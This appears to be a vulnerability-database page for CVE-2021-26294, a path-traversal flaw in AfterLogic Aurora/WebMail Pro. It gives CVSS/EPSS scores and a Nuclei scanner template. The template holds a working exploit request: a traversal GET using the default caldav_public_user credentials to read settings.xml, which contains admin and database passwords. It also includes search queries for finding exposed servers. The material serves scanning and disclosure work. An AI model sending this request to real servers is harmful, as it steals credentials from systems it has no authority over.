5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.22 Low
EPSS
Percentile
96.5%
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
id: CVE-2021-26294
info:
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure
author: johnk3r
severity: high
description: |
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
reference:
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-26294
- https://github.com/Threekiii/Awesome-POC
- https://github.com/soosmile/POC
- https://github.com/tzwlhack/Vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-26294
cwe-id: CWE-22
epss-score: 0.21969
epss-percentile: 0.96457
cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: afterlogic
product: aurora
fofa-query:
- "X-Server: AfterlogicDAVServer"
- "x-server: afterlogicdavserver"
tags: cve2021,cve,afterlogic,exposure,AfterLogic
http:
- raw:
- |
GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<AdminLogin>"
- "<AdminPassword>"
- "<DBHost>"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a00473045022100db3b9605b9b091097884dfe82d70288e337eae54bbefb926139d41d9b7c4b4ce02206c41d93b1c185cd9ef06c7cf71cfacc86d805c0a37f4c07eabb337978225e142:922c64590222798bb761d5b6d8e72950
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.22 Low
EPSS
Percentile
96.5%